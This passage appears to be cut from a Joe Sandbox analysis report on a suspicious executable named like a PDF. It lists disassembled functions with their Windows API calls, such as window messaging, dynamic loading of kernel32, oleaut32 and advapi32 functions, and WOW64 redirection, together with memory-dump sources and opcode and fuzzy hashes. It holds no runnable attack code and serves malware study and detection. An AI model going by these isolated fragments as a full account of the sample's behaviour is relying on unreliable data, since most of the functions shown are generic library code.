                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: SysMonthCal32
                                                    • API String ID: 2326795674-1439706946
                                                    • Opcode ID: ec109910077ee45d0af9be9ed875f083cdab414e0974df1a0528e6ce747d7fc3
                                                    • Instruction ID: 9491aeb65faa9ed33e9cdec7059fe091d7c35059da3a09f90fd85d951df9fee9
                                                    • Opcode Fuzzy Hash: ec109910077ee45d0af9be9ed875f083cdab414e0974df1a0528e6ce747d7fc3
                                                    • Instruction Fuzzy Hash: 0221AB33500618BBEF128FA4CC82FEA3B7AEF49714F110214FA55AB190D7B5AC55CBA0
                                                    Function 003AA88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 003AA941
                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 003AA94F
                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 003AA956
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$DestroyWindow
                                                    • String ID: msctls_updown32
                                                    • API String ID: 4014797782-2298589950
                                                    • Opcode ID: 7bccadcdf9d07575a9c094fd1b5118ff39351a5d58e8854aa007f80b1a927bf7
                                                    • Instruction ID: a2ce96dfc4fc017371ca6c8c9ecca0bbfe1035b9abe687eff71b71bd10052ee9
                                                    • Opcode Fuzzy Hash: 7bccadcdf9d07575a9c094fd1b5118ff39351a5d58e8854aa007f80b1a927bf7
                                                    • Instruction Fuzzy Hash: C92171B660060AAFEB12DF18CC91DB737ADEF5A3A4B45055DFA049B261CB31EC11CB61
                                                    Function 003A99A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003A9A30
                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003A9A40
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 003A9A65
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$MoveWindow
                                                    • String ID: Listbox
                                                    • API String ID: 3315199576-2633736733
                                                    • Opcode ID: 97c56d23a5ecb1920866fd83359e74d7a91b38a305826e5e053ec511717cf0ca
                                                    • Instruction ID: 9c955436a549e4f508bd2639efe7ac9715c38c140804038caa7f4eeb8ef447eb
                                                    • Opcode Fuzzy Hash: 97c56d23a5ecb1920866fd83359e74d7a91b38a305826e5e053ec511717cf0ca
                                                    • Instruction Fuzzy Hash: 4A218631610118BFDB128F54CC85FBB3BAEEF8A750F11412AF954AB190C7719C518790
                                                    Function 003AA409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003AA46D
                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003AA482
                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 003AA48F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: msctls_trackbar32
                                                    • API String ID: 3850602802-1010561917
                                                    • Opcode ID: 5dbd05dd210a5fdf813b386ef044717584b320fe76071686d2f88b1f62e627ec
                                                    • Instruction ID: 1b137bf9442fe3dc3b8ed93f8ee333441868e1706e5997e25928a77b43a22419
                                                    • Opcode Fuzzy Hash: 5dbd05dd210a5fdf813b386ef044717584b320fe76071686d2f88b1f62e627ec
                                                    • Instruction Fuzzy Hash: 4311E772200208BEEF225F65CC46FAB3B6DEF89754F024128FA45A61A1D7B2E811C724
                                                    Function 00362287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00362350,?), ref: 003622A1
                                                    • GetProcAddress.KERNEL32(00000000), ref: 003622A8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RoInitialize$combase.dll
                                                    • API String ID: 2574300362-340411864
                                                    • Opcode ID: 061b03e113fd36d58b3cb80a3b7fb60f15bd991caba0ef47a4d676debe18c04d
                                                    • Instruction ID: 10ae4f635a3fca6262cbf21446ac0063556212b09b5a5b5e1ca4d0c921c619e1
                                                    • Opcode Fuzzy Hash: 061b03e113fd36d58b3cb80a3b7fb60f15bd991caba0ef47a4d676debe18c04d
                                                    • Instruction Fuzzy Hash: ECE01A74A90701ABDB925F71ED49F653668BB00706F008434F142E90B4CFB65440DF08
                                                    Function 0036235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00362276), ref: 00362376
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0036237D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RoUninitialize$combase.dll
                                                    • API String ID: 2574300362-2819208100
                                                    • Opcode ID: 9e450e52136220866fa385a3f9f4a2ad19b9f21d68d5aa7fae401172d800b000
                                                    • Instruction ID: 60f59e0b4ec5989ad281798e13c10b6d06e6ba528c4878880720411397683414
                                                    • Opcode Fuzzy Hash: 9e450e52136220866fa385a3f9f4a2ad19b9f21d68d5aa7fae401172d800b000
                                                    • Instruction Fuzzy Hash: 86E0ECB4544701AFDB235F61FE0DF153A68B704702F124438F20EEA1B4CBBA6800DB18
                                                    Function 003BAC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: LocalTime__swprintf
                                                    • String ID: %.3d$WIN_XPe
                                                    • API String ID: 2070861257-2409531811
                                                    • Opcode ID: a50b67f14435d20545fb30f495ea7534014c6536e26bbd3a72e56a4354ebf78e
                                                    • Instruction ID: 715cbc91e8517f9b3117b0010a82d7b047295103f7ebe42fc1e6187896a30e9f
                                                    • Opcode Fuzzy Hash: a50b67f14435d20545fb30f495ea7534014c6536e26bbd3a72e56a4354ebf78e
                                                    • Instruction Fuzzy Hash: 0BE01271804E1CEBCB139750CD05DFAB7BCA704745F5444E2FA06E1C14E7359B84AB22
                                                    Function 003A2205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,003A21FB,?,003A23EF), ref: 003A2213
                                                    • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 003A2225
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetProcessId$kernel32.dll
                                                    • API String ID: 2574300362-399901964
                                                    • Opcode ID: b60ff05bbdae7157f588f85563fbdb6d0bd629c961b7bcfa253712c1413c84f8
                                                    • Instruction ID: 377c5f184875f753e64b17819e7f2d7697bc913a206f8621e04dd9665516bf9e
                                                    • Opcode Fuzzy Hash: b60ff05bbdae7157f588f85563fbdb6d0bd629c961b7bcfa253712c1413c84f8
                                                    • Instruction Fuzzy Hash: ADD0A73480071A9FD7675F34FC08B5376DCEB06300F154829F846E2150D770E8808750
                                                    Function 003442F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,003442EC,?,003442AA,?), ref: 00344304
                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00344316
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                    • API String ID: 2574300362-1355242751
                                                    • Opcode ID: 21caaa99a20e514e9a701526505d32105f8ca43fbb8a98cf9855baf8cd802f72
                                                    • Instruction ID: 14f69b9f9b13018155dce60b926ab641e6817146d80015be1c36d42ca7e929e2
                                                    • Opcode Fuzzy Hash: 21caaa99a20e514e9a701526505d32105f8ca43fbb8a98cf9855baf8cd802f72
                                                    • Instruction Fuzzy Hash: 05D0A7348047129FC7634F20EC0CB5276D8AB14701F154439F542D2160D7B0E8808710
                                                    Function 0034434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,003441BB,00344341,?,0034422F,?,003441BB,?,?,?,?,003439FE,?,00000001), ref: 00344359
                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0034436B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                    • API String ID: 2574300362-3689287502
                                                    • Opcode ID: 01ed62f9c60a0fd28b8d28af5e824d729c93322d5b2ac44f80e197e0b0e9cf85
                                                    • Instruction ID: 6c304e0e45ed581fdb2e277abb8e2a8acb9fe05437ce20bc6d21e3e261f51785
                                                    • Opcode Fuzzy Hash: 01ed62f9c60a0fd28b8d28af5e824d729c93322d5b2ac44f80e197e0b0e9cf85
                                                    • Instruction Fuzzy Hash: 83D0A934800712AFC7234F30EC09B9276E8AB20B15F16C43AF882D2290EBB0F8808B10
                                                    Function 00380539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(oleaut32.dll,?,0038051D,?,003805FE), ref: 00380547
                                                    • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00380559
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                    • API String ID: 2574300362-1071820185
                                                    • Opcode ID: 8b6e4378581748d39e9d5935e6d25d269a739969a6b6ec015b2fea6af1779638
                                                    • Instruction ID: 15b9f70c088b1dbe07bf9243fbf402afbe20a113cf51d6d499c0fbe068d9457f
                                                    • Opcode Fuzzy Hash: 8b6e4378581748d39e9d5935e6d25d269a739969a6b6ec015b2fea6af1779638
                                                    • Instruction Fuzzy Hash: 8BD0A730414712DFC7629F21EC08A5677E8AB01301F15C46DF457D2250D670D8848B20
                                                    Function 00380564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0038052F,?,003806D7), ref: 00380572
                                                    • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00380584
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                    • API String ID: 2574300362-1587604923
                                                    • Opcode ID: da4141c971c40b97ec2569e2a409006f536116bf36804fe10128fe24090aeacb
                                                    • Instruction ID: 3271dc7b7e470bd90fb4d8384e53ece4c29d05a25879ddef1cac95945874962f
                                                    • Opcode Fuzzy Hash: da4141c971c40b97ec2569e2a409006f536116bf36804fe10128fe24090aeacb
                                                    • Instruction Fuzzy Hash: 49D05E304147169EC7626F20A848A5377E8AB05300F158469F942D2654D670D4848B20
                                                    Function 0039ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0039ECBE,?,0039EBBB), ref: 0039ECD6
                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0039ECE8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                    • API String ID: 2574300362-1816364905
                                                    • Opcode ID: 62aa44e2be6defbb887124ec997996426d352fcce35c72e55aac819dee11cd36
                                                    • Instruction ID: 0b199319a1db2fd5b49b0b7a142205c7b85b3c694367f345f3a36bd2db34ebed
                                                    • Opcode Fuzzy Hash: 62aa44e2be6defbb887124ec997996426d352fcce35c72e55aac819dee11cd36
                                                    • Instruction Fuzzy Hash: CDD0A7308007239FCF239F61EC48A5376E8AB00300F158829F886D2150DB70D8808B10
                                                    Function 0039BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0039BAD3,00000001,0039B6EE,?,003DDC00), ref: 0039BAEB
                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0039BAFD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                    • API String ID: 2574300362-199464113
                                                    • Opcode ID: 41e2f2c9f92fa8b1f8516691fd4b574adb3d30d908ce0e24a929b30f47ad135f
                                                    • Instruction ID: e4432852f016f0459d2772ff6f3b745ee8266f024fe34b29598d2b7de5bfeb6e
                                                    • Opcode Fuzzy Hash: 41e2f2c9f92fa8b1f8516691fd4b574adb3d30d908ce0e24a929b30f47ad135f
                                                    • Instruction Fuzzy Hash: 3FD05E308047129FCB325F20B848A62B6D8AB00300F154429E943D2294DB70D880C710
                                                    Function 003A3BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,003A3BD1,?,003A3E06), ref: 003A3BE9
                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003A3BFB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                    • API String ID: 2574300362-4033151799
                                                    • Opcode ID: d9aeb69571b41c80161e0c27d8db624345cc18b98f46b4d378a2f43dee40b707
                                                    • Instruction ID: 49e85fc247e58c8b241aaa922c4848b87589f87ff4ef3096afbcd92e1997dfc4
                                                    • Opcode Fuzzy Hash: d9aeb69571b41c80161e0c27d8db624345cc18b98f46b4d378a2f43dee40b707
                                                    • Instruction Fuzzy Hash: 00D0A7705007169FC7225F60EC09A93BAF8EB03324F154429F446E2150D6B0D4808F10
                                                    Function 00379B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 43cb1b24387e82cc51b871a9fecb92628409725c946f793359169eba2e8301dc
                                                    • Instruction ID: fd3d77edfc775469d0c2ebfa93aaceacd1d848d2db7fb93f6a9ebc3a6e415d03
                                                    • Opcode Fuzzy Hash: 43cb1b24387e82cc51b871a9fecb92628409725c946f793359169eba2e8301dc
                                                    • Instruction Fuzzy Hash: 51C15E75A00216EFDB26CF94C884BAEB7B5FF48700F118699E909AB251D734DE41DB90
                                                    Function 0039AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 0039AAB4
                                                    • CoUninitialize.OLE32 ref: 0039AABF
                                                      • Part of subcall function 00380213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0038027B
                                                    • VariantInit.OLEAUT32(?), ref: 0039AACA
                                                    • VariantClear.OLEAUT32(?), ref: 0039AD9D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
